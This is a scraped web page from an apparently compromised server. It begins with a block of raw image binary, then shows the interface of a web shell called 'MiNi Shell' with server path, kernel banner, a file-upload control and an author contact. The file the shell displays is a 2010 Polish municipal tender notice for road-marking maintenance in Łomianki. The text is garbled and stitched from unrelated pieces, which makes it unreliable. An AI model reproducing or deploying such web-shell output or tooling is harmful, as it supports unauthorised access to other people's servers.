JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/15109-N-2010.html

<p class="kh_header"><b>Łomianki: Uzupełnianie i odtwarzanie oznakowania drogowego na terenie Gminy Łomianki w 2010 roku</b><br>
<b>Numer ogłoszenia: 15109 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 0-22 7686302, faks 0-22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uzupełnianie i odtwarzanie oznakowania drogowego na terenie Gminy Łomianki w 2010 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest uzupełnianie i odtwarzanie oznakowania drogowego na terenie Gminy Łomianki, obejmująca:
1)	Odtworzenie oznakowania poziomego:
a)	Malowanie farbą odblaskową, koloru białego, zgodnie z projektami stałej organizacji ruchu 
i w miejscach wskazanych przez Zamawiającego.
b)	Malowanie masą, chemoutwardzalną, dwuskładnikową, koloru białego i czerwonego, zgodnie z projektami stałej organizacji ruchu i w miejscach wskazanych przez Zamawiającego:
2)	Odnowienie istniejącego oznakowania pionowego:
a)	Mycie słupków oznakowania pionowego, znaków drogowych wskazanych przez Zamawiającego. 
b)	Czyszczenie słupków oznakowania pionowgo, usuniecie rdzy pomalowanie słupków farbą podkładową w kolorze białym i nawierzchniową w kolorze białym lub szarym w miejscach wskazanych przez Zamawiającego.
c)	Czyszczenie słupków przeszkodowych, usuniecie rdzy pomalowanie słupków farbą podkładową w kolorze białym i nawierzchniową w kolorze białym i czerwonym w miejscach wskazanych przez Zamawiającego.
3)	Przeprowadzenie przeglądu oznakowania ulicznego oraz tablic informacyjnych i tabliczek z nazwami ulic.
a)	Regulacja znaków drogowych i tabliczek z nazwami ulic - ustawienie znaku/tabliczki z nazwą ulicy, dokręcenie śrub mocujących.
b)	Regulacja słupków
c)	Sporządzenie protokołu przeglądu z wyszczególnieniem wykonanych prac oraz wykazem niezgodności z organizacją ruchu..
4)	Uzupełnienie lub wymiana:a) słupków średnica 2, ocynkowanych malowanych proszkowo w kolorze jasno szarym lub białym. b) znaków drogowych i tablic informacyjnych wykonanych z blachy stalowej  ocynkowanej malowanych proszkowo i wyklejonych  folią odblaskową, zgodnie ze stosowanymi przepisami c) tabliczek z nazwami ulic  wraz z uchwytami: jednostronnych lub dwustronnych. Dwustronnych połączonych ze sobą  trwale , zagięte na 3 bokach na szerokości  15 mm, w sposób umożliwiający  wsunięcie jednej tabliczki w drugą,  w środku  między tabliczkami  należy  zastosować ramkę  stalową 20x20x2 mm malowaną proszkowo, mocowaną na zawieszce , wykonanych z blachy aluminiowej  o grubości 1,25 mm , lico  folia odblaskowa TYP I, w kolorze białym. Wymiary tabliczek: 250 x 1200 mm lub 250 x 100  mm lub 250x 800 mm , 250 x 600 mm, w zależnosći  od długości  nazwy ulicy. Litery wyklejane z folii w kolorze czarnym , czcionka pogrubiona  FRANCLIN  GOTHIC MEDIUM , skala horyzontalna 93%, wysokość 98 mm, ramka wyklejana w kolorze czarnym , grubość 7 mm , płomień łuku  zewnętrzny 8 mm,płomień łuku wewnętrzny 3 mm, wymiary ramki: dla tabliczkio dł. 1200 mm. : 1030 x 172,5 mm:1000 mm-8630x 172,5 mm  800 mm-630 x 172,5 : 600 mm 423 x 172,5 mm.Herb umieszczony centralnie między zawieszką a ramką , wysokość 12 mm, wydruk na folii. Wzór i kolorystyka herbu wg. załącznika.Pasek umieszczony w dolnej części  tabliczki, na całej długości tabliczki, wydruk na folii w kolorze tła herbu, z nazwą obszaru lub z numeracją ulicy  i strzałkami  kierunkowymi, czcionka Arial , wysokość czcionki  46 mm. d) Znaków drogowych, tablic i tabliczek z nazwami  ulicy - wykonanych  na zdemontowanym oznakowaniu, wyklejonych folią odblaskową , zgodnie ze stosowanymi  przepisami  (znaki i tablice drogowe), wyklejenie folią odblaskową  wg wzoru  okreśłonego dla tabliczek z nazwami ulic (tabliczki z nazwami ulic).
 Termin płatności wynagrodzenia - 14 dni od daty złożenia prawidłowo wystawionej faktury VAT. 
Warunki gwarancji: oznakowanie poziome jezdni białą farbą odblaskową   na okres 12 miesięcy od daty protokolarnego, bezusterkowego odbioru wykonania usług, oznakowanie poziome jezdni masą chemoutwardzalną   na okres 60 miesięcy od daty protokolarnego, bezusterkowego odbioru wykonania usług,
dostarczone i zainstalowane znaki  drogowe pionowe (w tym słupki, tablice, chwyty) na okres 72 miesięcy od daty protokolarnego, bezusterkowego odbioru usług. Na podstawie art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie w formie aneksu.
W przypadku uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia zaproponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego. W przypadku zmian przepisów powiązanych z ustawą Pzp lub przedmiotem zamówienia. Przewiduje się również możliwość zmiany umowy z przyczyn innych niż wskazanych powyżej,  jeżeli konieczność wprowadzenia takiej zmiany wyniknie z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, pomimo  zachowania należytej staranności. Ewentualne Zmiany będą dokonane w formie aneksu i nie będą stanowić podstawy do zwiększenia wynagrodzenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.31.62.13-1, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium  wysokosći 800,00 zł. (osiemset złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, określone w art. 22 ust.1  oraz art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych dotyczące:
1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
2.	posiadania wiedzy i doświadczenia; 
3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4.	sytuacji ekonomicznej i finansowej. 
5.	nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokona wg formuły
spełnia / nie spełnia w oparciu o informacje zawarte w  złożonych przez Wykonawcę dokumentach
i oświadczeniach, stanowiących integralną część złożonej oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Pzp oraz zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. 
w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form,
w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) Zamawiający żąda:
a.	Wykazu wykonanych, lub wykonywanych  usług w którym Wykonawca przedstawi  minimum dwa zamówienia w  zakresie konserwacji  oznakowania  drogowego o wartości minimum 80 000,00 zł brutto każde, wykonane lub wykonywane w okresie  ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich
wartości,  przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie;
b.	Opłaconej polisy, a przypadku  jej  braku  innego  dokumentu  potwierdzającego,
że  Wykonawca jest  ubezpieczony  od odpowiedzialności  cywilnej  w zakresie  prowadzonej działalności  związanej  z przedmiotem zamówienia.
c.	Oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1.
2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy
 w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp oraz zgodnie
z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817)  Zamawiający żąda:
a.	Oświadczenia o braku podstaw do wykluczenia,
b.	Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy Pzp tj; Wykonawców, w stosunku do których nie otwarto likwidacji lub których upadłość nie ogłoszono,
 z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego; 
3.	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp,
a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w punkcie 2 - żądanych w celu wykazania braku podstaw wykluczenia.
 
a.	Ponadto w powyższej sytuacji Zamawiający żąda od Wykonawcy udowodnienia Zamawiającemu,
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, oraz 
w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej osoby,
o których mowa w art. 24 ust. 1 pkt. 5-8 ustawy Pzp mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodne z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817). 
5.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać,
że łącznie spełniają warunki określone powyżej.
6.	W przypadku Wykonawców występujących wspólnie należy załączyć do oferty pełnomocnictwo 
do reprezentowania ich w postępowaniu o zamówienie publiczne albo do reprezentowania 
w postępowaniu i zawarcia umowy o zamówienie publiczne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www..lomianki.pl (bip).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomiankach ul. Warszawska 115, 
05-092 Łomianki, pok. nr 1,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 12:00, miejsce: Urząd Miejski w Łomiankach ul. Warszawska 115, 
05-092 Łomianki, pok. nr 1,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com